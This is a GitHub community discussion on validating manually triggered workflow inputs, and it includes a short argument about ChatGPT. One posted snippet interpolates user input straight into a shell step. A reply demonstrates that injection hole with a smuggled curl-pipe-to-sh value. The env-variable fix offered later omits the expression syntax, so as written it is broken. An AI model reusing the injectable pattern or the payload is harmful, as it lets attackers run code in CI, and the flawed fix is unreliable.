### DISCUSSION TITLE
What is the "correct" way to validate inputs for a manually triggered workflow

### DISCUSSION THREAD

**Discussion by jason-oc** [community/community#48373] [Actions]
### Select Topic Area

Question

### Body

Please share with me and with the community how you handle input validation for manually triggered workflows so that we might (in lieu of any officially recommended solution) learn of a more elegant solution than what we currently employ in our own workflows. Thank you.

**Comment by jsoref** [comment]
[ChatGPT is a 🐄💩 generator](https://www.vice.com/en/article/akex34/chatgpt-is-a-bullshit-generator-waging-class-war).

Please do yourself a favor and don't use it as a source of knowledge, it isn't.

The source of knowledge for workflows is the github docs for workflows.

As a favor, please allow me to provide a link to the actual documentation (you could use a normal search engine to find this, and I'd encourage you to practice learning how to do this):

https://docs.github.com/en/actions/using-workflows/triggering-a-workflow#defining-inputs-for-manually-triggered-workflows

The short answer is that you cannot ask github to do what you want declaratively at the input stage. You can use an [`if`](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idif) to control flow and cause the workflow to effectively only run a single step that fails, or you could use an [`if`](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idif) on two different jobs and have one job that runs a single thing that reports the input isn't valid and a different job that does real work.

Implementing any of this is left as an exercise for a human. Again, please don't ask ChatGPT to do your homework for you.

**Reply by Anmol-Baranwal** [reply]
Just like any other technology or tool, the value of an AI language model is measured by how effectively it can help people, not by derogatory comments or unfounded criticism.

While it is true that seeking out information on your own through docs can enhance your understanding and knowledge base, I believe that it is not necessary to completely reinvent the wheel in order to do so. For instance, while opposing the use of modern AI tools, it may not be practical to create your own version control system instead of using something like GitHub.

Adapting to changes is a fundamental skill for everyone. Someone who is eager to learn can still benefit greatly from using tools like ChatGPT, and their resulting knowledge may be just as valuable as if they had followed a more traditional method of learning.

**Reply by jsoref** [reply]
That sounds like it was written by ChatGPT.

My criticism is not *unfounded*. Relying on things that don't exist and being surprised they don't work and then asking other people how to make it work is absolutely rude and is definitely the fault of relying on the "lies ChatGPT told me". This is a perfectly valid criticism.

You should not walk into a classroom and shoot a gun at a whiteboard just because someone on a farm said that they could use a gun to draw lines on the broad side of a barn.

**Reply by jason-oc** [reply]
I can see there is a need to reword my question.

**Reply by Anmol-Baranwal** [reply]
> I can see there is a need to reword my question.

No need, feel free to express your thoughts. We are all here to learn and grow together.

**Reply by jason-oc** [reply]
> No need, feel free to express your thoughts. We are all here to learn and grow together.

Not all of us, apparently.

**Reply by Chlorus** [reply]
> As a favor, please allow me to provide a link to the actual documentation (you could use a normal search engine to find this, and I'd encourage you to practice learning how to do this):

Ironically, I did this, and the top hit was answered with an off-topic diatribe about ChatGPT. Thank you for reminding us as to why AI tools are in such demand (it spares us from being subjected to off-topic, condescending rants)

**Comment by jonmchan** [comment]
**EDIT: PLEASE CONSIDER USING @aarcro solution to avoid remote shell script injection. Look at the thread for explanation of the potential risks to my original solution.**

I'm sorry that you didn't get your question answered... it seems pretty legit question, irregardless with how you are trying to find the answer....

Here's what I've tried doing:

```
on:
  workflow_dispatch:
    inputs:
      environment:
        type: choice
        description: 'Which environment to run this on'
        required: true
        default: 'development'
        options:
          - development
          - production
      tag:
        type: string
        description: 'Which tag to utilize'
        required: true
      
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Validation For Tag in Production
        if: ${{ github.event.inputs.environment == 'production' }}
        run: |
          echo "Validating that tag is a production deploy tag (must be in the format 20230101-1035)"
          echo "${{ github.event.inputs.tag }}" |grep -P '^[0-9]{8}-[0-9]{4}'
```

Any exit code in a script that is not exit 0 will terminate github action step and subsequently everything after this. Here's how I am validating my inputs.

**Reply by johnbatclari** [reply]
Fabulous answer, @jonmchan. Thank you for sharing! 

And thanks to @jason-oc for asking the question. The "ye shall RTFM" drama was entirely counterproductive given the GitHub docs don't offer much in the way of how to perform fine(r)-grained validation of inputs.

**Reply by jordanst3wart** [reply]
Just be aware, I think i can input a tag as a string: `" && curl https://some-malware-script.sh | sh && echo "20230101-1035"`
And i'm running a malware script on your production environment. Github action strings don't escape.

So that would evaluate to: `echo "" && curl https://some-malware-script.sh | sh && echo "20230101-1035" |grep -P '^[0-9]{8}-[0-9]{4}'`, and still pass that step

**Reply by aarcro** [reply]
Late to this party, but the solution is to pass the value through the environment:

```
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Validation For Tag in Production
        if: ${{ github.event.inputs.environment == 'production' }}
        env:
            TAG: github.event.inputs.tag
        run: |
          echo "Validating that tag is a production deploy tag (must be in the format 20230101-1035)"
          echo "${TAG}" |grep -P '^[0-9]{8}-[0-9]{4}'
```

Now the contents of $TAG are treated as a string at run time, rather then injected as a string replacement before running the script.
